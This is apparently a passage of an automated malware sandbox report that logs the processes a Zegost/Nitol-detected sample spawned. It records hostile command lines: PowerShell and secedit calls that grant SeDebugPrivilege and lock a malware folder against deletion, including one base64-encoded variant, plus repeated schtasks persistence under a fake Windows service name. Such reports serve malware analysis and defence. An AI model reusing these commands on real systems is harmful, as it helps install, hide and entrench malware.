Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	22:24:34
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Imagebase:	0xfa0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3476, Parent PID: 7092

General

Target ID:	26
Start time:	22:24:34
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	22:24:35
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c echo.>c:\inst.ini
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	22:24:35
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	22:24:35
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Imagebase:	0xe60000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	22:24:35
Start date:	28/12/2024
Path:	C:\ProgramData\Program\iusb3mon.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\program\iusb3mon.exe
Imagebase:	0x340000
File size:	2'633'392 bytes
MD5 hash:	22AF53F40D27C913642C0572C73A5D87
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	22:24:36
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Imagebase:	0xe60000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	22:24:36
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Imagebase:	0xe60000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	22:24:37
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Imagebase:	0xe60000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	22:24:37
Start date:	28/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	22:24:38
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	22:24:38
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	22:24:38
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	22:24:38
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	22:24:39
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	22:24:45
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	22:24:45
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	22:24:52
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Imagebase:	0xfa0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: powershell.exePID: 7704, Parent PID: 4144

General

Target ID:	47
Start time:	22:24:52
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Imagebase:	0xfa0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7712, Parent PID: 7696

General

Target ID:	48
Start time:	22:24:52
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	22:24:52
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Imagebase:	0xfa0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7728, Parent PID: 7704

General

Target ID:	50
Start time:	22:24:52
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	22:24:52
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	22:24:53
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7912, Parent PID: 7904

General

Target ID:	53
Start time:	22:24:53
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	22:24:55
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Imagebase:	0xe60000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	22:24:55
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Imagebase:	0xe60000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	22:24:55
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Imagebase:	0xe60000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	22:24:58
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6984, Parent PID: 7304

General

Target ID:	58
Start time:	22:24:58
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	22:24:58
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	22:24:59
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff7403e0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7348, Parent PID: 4020

General

Target ID:	61
Start time:	22:24:59
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	22:25:04
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7412, Parent PID: 5684

General

Target ID:	63
Start time:	22:25:04
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	22:25:04
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	22:25:05
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6752, Parent PID: 2364

General

Target ID:	66
Start time:	22:25:05
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	22:25:11
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7572, Parent PID: 7552

General

Target ID:	68
Start time:	22:25:11
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	22:25:11
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7580, Parent PID: 7600

General

Target ID:	70
Start time:	22:25:11
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	22:25:12
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	22:25:17
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6272, Parent PID: 6276

General

Target ID:	73
Start time:	22:25:17
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	22:25:17
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5836, Parent PID: 6408

General

Target ID:	75
Start time:	22:25:17
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	22:25:17
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	22:25:22
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
